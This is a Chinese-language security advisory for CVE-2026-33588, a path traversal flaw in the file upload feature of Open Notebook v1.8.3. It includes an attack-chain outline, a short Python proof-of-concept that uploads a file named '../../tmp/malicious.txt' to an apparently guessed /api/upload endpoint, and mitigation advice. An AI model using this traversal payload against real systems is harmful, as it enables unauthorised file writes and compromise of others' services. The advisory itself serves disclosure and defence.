CVE-2026-33588 CVSS 8.1 高危

CVE-2026-33588 Open Notebook 路径遍历漏洞

披露日期: 2026-05-07

来源: a6d3dc9e-0591-4a13-bce7-0f5b31ff6158

漏洞信息

漏洞编号

CVE-2026-33588

漏洞类型

路径遍历

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Open Notebook

漏洞概述

Open Notebook v1.8.3 版本中存在严重的安全漏洞。该漏洞归因于文件上传功能缺乏对用户输入的有效验证。经过身份认证的攻击者可利用路径遍历技术，在 Docker 容器内的任意位置创建或修改文件。此漏洞对系统的完整性和可用性造成严重影响，可能导致服务被控制或敏感数据被篡改。

技术细节

该漏洞的核心问题在于 Open Notebook v1.8.3 在处理文件上传请求时，未对用户提交的文件名或路径参数进行严格的过滤和验证。攻击者利用这一缺陷，可以在上传文件时在文件名字段中注入路径遍历序列（如 `../`）。由于应用程序部署在 Docker 容器环境中，且可能以较高的权限运行，通过精心构造的恶意请求，攻击者能够绕过预期的上传目录限制，将文件写入容器文件系统的任意位置。这种能力允许攻击者覆盖关键系统文件、插入恶意脚本或修改应用程序配置，从而完全破坏系统的完整性并可能导致拒绝服务。

攻击链分析

STEP 1

侦察

攻击者识别目标运行的是 Open Notebook v1.8.3，并确认其暴露在网络上。

STEP 2

获取凭证

由于 CVSS 向量显示 PR:L (低权限)，攻击者需要获取一个普通用户账号权限。

STEP 3

构造载荷

攻击者准备一个恶意文件，并在文件名中插入路径遍历字符（如 `../../`），指向容器内的敏感路径。

STEP 4

执行攻击

攻击者通过文件上传接口发送包含恶意文件名的请求，绕过服务器端的简单检查。

STEP 5

达成影响

文件被成功写入容器内的非预期位置，导致文件被创建或修改，影响系统完整性和可用性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_poc(target_url):
    """
    PoC for CVE-2026-33588: Path Traversal via File Upload
    """
    # The endpoint might vary, this is a generic example based on the description
    upload_endpoint = f"{target_url}/api/upload"
    
    # Path traversal payload to write to a sensitive location in the container
    # e.g., writing to /tmp/malicious.txt
    malicious_filename = "../../tmp/malicious.txt"
    
    files = {
        'file': (malicious_filename, 'This is a test content for path traversal.', 'text/plain')
    }
    
    try:
        response = requests.post(upload_endpoint, files=files, timeout=10)
        if response.status_code == 200:
            print(f"[+] Request sent successfully. File may have been written as: {malicious_filename}")
        else:
            print(f"[-] Failed. Status Code: {response.status_code}")
    except Exception as e:
        print(f"Error occurred: {e}")

# Example usage
# exploit_poc("http://target-host:port")

影响范围

Open Notebook v1.8.3

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用文件上传功能或仅允许受信任的 IP 地址访问。同时，应检查 Docker 容器内的文件系统，确认是否存在异常的新建或被修改的文件，并利用容器只读层（Read-only filesystems）等技术限制写入权限。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表